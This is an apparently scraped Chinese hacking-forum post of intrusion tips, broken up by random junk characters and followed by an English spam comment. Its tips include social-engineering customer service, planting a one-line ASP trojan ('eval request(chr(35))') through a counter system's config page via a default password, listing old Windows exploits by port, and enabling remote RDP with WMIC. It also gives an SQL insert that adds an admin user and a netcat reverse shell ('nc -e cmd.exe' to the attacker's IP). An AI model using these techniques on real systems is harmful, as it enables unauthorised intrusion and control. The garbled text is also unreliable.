2 ^" ~% ?$ c3 k! G; U. v社会工程学:3 P& [/ i# q/ d6 }. T5 l3 Y
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人 3 w3 Q! G; }: |3 Y% d) ^, E然后去骗客服0 Y) ]1 p3 y k7 Q9 |9 J% x6 s p
[9 K2 q5 o3 k$ V0 [ l, o. w 6 x, W+ L7 _( m9 J0 n5 E6 }7 G统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: M; z- X$ t( ?9 ^. T查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, / A5 P1 u+ h) j O! y$ G1 `/ t
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。 5 S5 R1 m3 B& }- w' c, U 8 l6 G+ `. v' S6 i % E( m' t* s. r$ V: p6 x; I) W% y g/ W
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)# D" [7 D" k; o
; S3 r! ]5 ]0 e# _/ M k% ?
" p. v# x& U- n% a( [
( L. R4 n2 t7 P4 l% d) u2 e( zCMD加密注册表位置 3 @5 X0 f. e, E) R9 u(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor: M+ Q9 P2 J7 E8 j4 B
AutoRun & Q8 ?7 U% X# v. |3 ^7 w/ g + H) [6 c- o: J2 `(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor) V: S. L, `0 K' s5 o. Z. Q( H
AutoRun- X0 v' a1 r1 z2 g& N8 s
: d5 Y5 X" t8 P% ^+ G
% \1 D) F1 G/ w在找注入时搜索Hidden,把他改成test$ R" i: F3 j- N! R
4 g/ G, w+ V1 Q: T# O
# t! k* c; ?* K; k7 h0 Y: f% S% R. E7 M3 v/ z
mstsc /v:IP /console ! H( _2 H4 K R. b' i
3 e# V0 r4 I$ S) m4 J$ ]" U/ l4 P
; ]1 o; k+ ^6 w9 x
一句话开3389:0 o% v( Q+ {8 j! O4 p; S
7 x8 I9 ^: q% K2 c& g3 E
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 0 X$ R/ Z: W# N. H; Z: Y7 a9 {( n- u开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了. 3 S9 q1 D- m4 k3 g1 m0 B+ r 9 l7 m2 q7 {, D3 q3 p8 G1 h n% Q* Z8 X* f# V, e' u) v
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下: 6 H9 |: U5 z5 I9 L$ v, HInsert into admin(user,pwd) values('test','test')) ]) R/ f' z; O% I6 R" f4 V
3 ~; z' F. K' |5 y( N" q
! U% H, J3 t; U( u1 [
NC反弹 ! v* e# H$ b# Z1 `; Q) ]$ s+ W先在本机执行: nc -vv -lp 监听的端口 (自己执行) : L$ {, \9 G) i" Q h3 n1 P9 C A. `
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行) ; X6 Z0 I: H9 m+ A* l0 m+ w* T: v. D! k! X% l/ a$ x
0 _/ t/ q! g9 [2 h
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题! I2 E" E6 s, Y+ g6 x
( p* W7 f4 H0 L有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录$ e7 y1 }2 f! p4 T; `5 _5 N1 Y( |
例如: & y2 `4 `+ R0 x1 a1 N, t- B: \7 g( m0 lsubst k: d:\www\ 用d盘www目录替代k盘( m# V3 B/ C7 j0 H+ P: N! J% i
subst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta